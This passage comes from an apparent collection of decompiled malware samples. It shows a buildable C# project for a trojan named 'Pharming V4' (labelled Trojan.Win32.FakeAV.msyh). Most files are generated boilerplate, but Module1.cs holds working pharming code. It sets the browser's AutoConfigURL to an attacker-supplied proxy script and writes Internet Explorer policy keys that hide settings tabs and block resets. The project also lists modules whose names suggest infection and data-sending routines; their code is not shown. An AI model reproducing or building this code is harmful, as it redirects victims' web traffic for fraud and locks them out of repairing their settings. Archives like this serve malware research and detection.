<value>AAEAAAD/////AQAAAAAAAAAMAgAAAExTeXN0ZW0sIFZlcnNpb249MS4wLjUwMDAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAAAQAAAL</value>
</data>
<data name="$this.Locked" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAAs=</value>
</data>
<data name="$this.DrawGrid" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAQs=</value>
</data>
<data name="$this.Localizable" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAAs=</value>
</data>
<data name="$this.Language" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAACBTeXN0ZW0uR2xvYmFsaXphdGlvbi5DdWx0dXJlSW5mbwoAAAAGbV9uYW1lCm1fZGF0YUl0ZW0RbV91c2VVc2VyT3ZlcnJpZGUJY3VsdHVyZUlEDG1faXNSZWFkT25seQtjb21wYXJlSW5mbwh0ZXh0SW5mbwdudW1JbmZvDGRhdGVUaW1lSW5mbwhjYWxlbmRhcgEAAAAAAwMDAwMIAQgBIFN5c3RlbS5HbG9iYWxpemF0aW9uLkNvbXBhcmVJbmZvHVN5c3RlbS5HbG9iYWxpemF0aW9uLlRleHRJbmZvJVN5c3RlbS5HbG9iYWxpemF0aW9uLk51bWJlckZvcm1hdEluZm8nU3lzdGVtLkdsb2JhbGl6YXRpb24uRGF0ZVRpbWVGb3JtYXRJbmZvHVN5c3RlbS5HbG9iYWxpemF0aW9uLkNhbGVuZGFyBgIAAAAAygAAAAB/AAAAAQkDAAAACQQAAAAJBQAAAAoKBAMAAAAgU3lzdGVtLkdsb2JhbGl6YXRpb24uQ29tcGFyZUluZm8CAAAACXdpbjMyTENJRAdjdWx0dXJlAAAICH8AAAB/AAAABAQAAAAdU3lzdGVtLkdsb2JhbGl6YXRpb24uVGV4dEluZm8DAAAAC21fbkRhdGFJdGVtEW1fdXNlVXNlck92ZXJyaWRlDW1fd2luMzJMYW5nSUQAAAAIAQjKAAAAAH8AAAAEBQAAACVTeXN0ZW0uR2xvYmFsaXphdGlvbi5OdW1iZXJGb3JtYXRJbmZvHwAAABBudW1iZXJHcm91cFNpemVzEmN1cnJlbmN5R3JvdXBTaXplcxFwZXJjZW50R3JvdXBTaXplcwxwb3NpdGl2ZVNpZ24MbmVnYXRpdmVTaWduFm51bWJlckRlY2ltYWxTZXBhcmF0b3IUbnVtYmVyR3JvdXBTZXBhcmF0b3IWY3VycmVuY3lHcm91cFNlcGFyYXRvchhjdXJyZW5jeURlY2ltYWxTZXBhcmF0b3IOY3VycmVuY3lTeW1ib2wSYW5zaUN1cnJlbmN5U3ltYm9sCW5hblN5bWJvbBZwb3NpdGl2ZUluZmluaXR5U3ltYm9sFm5lZ2F0aXZlSW5maW5pdHlTeW1ib2wXcGVyY2VudERlY2ltYWxTZXBhcmF0b3IVcGVyY2VudEdyb3VwU2VwYXJhdG9yDXBlcmNlbnRTeW1ib2wOcGVyTWlsbGVTeW1ib2wKbV9kYXRhSXRlbRNudW1iZXJEZWNpbWFsRGlnaXRzFWN1cnJlbmN5RGVjaW1hbERpZ2l0cxdjdXJyZW5jeVBvc2l0aXZlUGF0dGVybhdjdXJyZW5jeU5lZ2F0aXZlUGF0dGVybhVudW1iZXJOZWdhdGl2ZVBhdHRlcm4WcGVyY2VudFBvc2l0aXZlUGF0dGVybhZwZXJjZW50TmVnYXRpdmVQYXR0ZXJuFHBlcmNlbnREZWNpbWFsRGlnaXRzCmlzUmVhZE9ubHkRbV91c2VVc2VyT3ZlcnJpZGUVdmFsaWRGb3JQYXJzZUFzTnVtYmVyF3ZhbGlkRm9yUGFyc2VBc0N1cnJlbmN5BwcHAQEBAQEBAQEBAQEBAQEBAAAAAAAAAAAAAAAAAAgICAgICAgICAgICAEBAQEJBgAAAAkHAAAACQYAAAAGCQAAAAErBgoAAAABLQYLAAAAAS4GDAAAAAEsBg0AAAABLAYOAAAAAS4GDwAAAALCpAoGEAAAAANOYU4GEQAAAAhJbmZpbml0eQYSAAAACS1JbmZpbml0eQkLAAAACQwAAAAGFQAAAAElBhYAAAAD4oCwygAAAAIAAAACAAAAAAAAAAAAAAABAAAAAAAAAAAAAAACAAAAAQABAQ8GAAAAAQAAAAgDAAAADwcAAAABAAAACAMAAAAL</value>
</data>
<data name="$this.GridSize" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAFRTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABNTeXN0ZW0uRHJhd2luZy5TaXplAgAAAAV3aWR0aAZoZWlnaHQAAAgIAgAAAAgAAAAIAAAACw==</value>
</data>
<data name="$this.TrayHeight" mimetype="application/x-microsoft.net.object.binary.base64">
<value>UAAAAA==</value>
</data>
</root>
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Pharming V4")]
[assembly: AssemblyCopyright("Copyright © 2012")]
[assembly: AssemblyTitle("Pharming V4")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("775a76db-098b-4786-ae35-ed8d8c85047c")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/Module1.cs
+45
View File
@@ -0,0 +1,45 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.Module1
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
namespace Pharming_V4
{
[StandardModule]
internal sealed class Module1
{
public static string osName = "UN";
[STAThread]
public static void Main()
{
pharmantiga.pharmantiga();
pharmnova.pharmnova();
so.so();
enviophp.enviophp();
criatxtinfect.criatxtinfect();
atproxy.atproxy();
}
public static object a(string b)
{
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\", true).SetValue("AutoConfigURL", (object) b);
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Policies\\Microsoft\\Internet Explorer\\Control Panel", true).SetValue("AdvancedTab", (object) 0);
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Policies\\Microsoft\\Internet Explorer\\Control Panel", true).SetValue("ResetWebSettings", (object) 0);
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Policies\\Microsoft\\Internet Explorer\\Control Panel", true).SetValue("AdvancedTab", (object) 0);
Registry.CurrentUser.OpenSubKey("SOFTWARE\\Policies\\Microsoft\\Internet Explorer\\Control Panel", true).SetValue("ConnectionsTab", (object) 1);
Registry.LocalMachine.OpenSubKey("SOFTWARE\\Policies\\Microsoft\\Internet Explorer\\Control Panel", true).SetValue("AdvancedTab", (object) 0);
Registry.LocalMachine.OpenSubKey("SOFTWARE\\Policies\\Microsoft\\Internet Explorer\\Control Panel", true).SetValue("ResetWebSettings", (object) 0);
Registry.LocalMachine.OpenSubKey("SOFTWARE\\Policies\\Microsoft\\Internet Explorer\\Control Panel", true).SetValue("Autoconfig", (object) 0);
Registry.LocalMachine.OpenSubKey("SOFTWARE\\Policies\\Microsoft\\Internet Explorer\\Control Panel", true).SetValue("AdvancedTab", (object) 0);
Registry.LocalMachine.OpenSubKey("SOFTWARE\\Policies\\Microsoft\\Internet Explorer\\Control Panel", true).SetValue("ConnectionsTab", (object) 1);
return (object) b;
}
}
}
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/My/MyApplication.cs
+18
View File
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.My.MyApplication
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
namespace Pharming_V4.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyApplication : ConsoleApplicationBase
{
}
}
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.My.MyComputer
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace Pharming_V4.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/My/MyProject.cs
+189
View File
@@ -0,0 +1,189 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.My.MyProject
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace Pharming_V4.My
{
[HideModuleName]
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/My/MySettings.cs
+23
View File
@@ -0,0 +1,23 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.My.MySettings
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace Pharming_V4.My
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[CompilerGenerated]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
public static MySettings Default => MySettings.defaultInstance;
}
}
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/My/MySettingsProperty.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.My.MySettingsProperty
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace Pharming_V4.My
{
[HideModuleName]
[DebuggerNonUserCode]
[StandardModule]
[CompilerGenerated]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings => MySettings.Default;
}
}
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/My/Resources/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.My.Resources.Resources
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Pharming_V4.My.Resources
{
[StandardModule]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[HideModuleName]
[DebuggerNonUserCode]
[CompilerGenerated]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) Pharming_V4.My.Resources.Resources.resourceMan, (object) null))
Pharming_V4.My.Resources.Resources.resourceMan = new ResourceManager("Pharming_V4.Resources", typeof (Pharming_V4.My.Resources.Resources).Assembly);
return Pharming_V4.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Pharming_V4.My.Resources.Resources.resourceCulture;
set => Pharming_V4.My.Resources.Resources.resourceCulture = value;
}
}
}
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/Trojan.Win32.FakeAV.msyh.csproj
+60
View File
@@ -0,0 +1,60 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{FF8411B8-2348-449F-A302-CC96F034DF70}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Pharming V4</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Pharming_V4</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="atproxy.cs" />
<Compile Include="criatxtinfect.cs" />
<Compile Include="enviophp.cs" />
<Compile Include="firefox.cs" />
<Compile Include="Module1.cs" />
<Compile Include="pharmantiga.cs" />
<Compile Include="pharmnova.cs" />
<Compile Include="phpenvioinfect.cs" />
<Compile Include="smtpenvioinfect.cs" />
<Compile Include="so.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/Trojan.Win32.FakeAV.msyh.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Pharming V4", "Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.csproj", "{FF8411B8-2348-449F-A302-CC96F034DF70}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{FF8411B8-2348-449F-A302-CC96F034DF70}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{FF8411B8-2348-449F-A302-CC96F034DF70}.Debug|Any CPU.Build.0 = Debug|Any CPU
{FF8411B8-2348-449F-A302-CC96F034DF70}.Release|Any CPU.ActiveCfg = Release|Any CPU
{FF8411B8-2348-449F-A302-CC96F034DF70}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/F/Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2/atproxy.cs
+214
View File
@@ -0,0 +1,214 @@
// Decompiled with JetBrains decompiler
// Type: Pharming_V4.atproxy
// Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
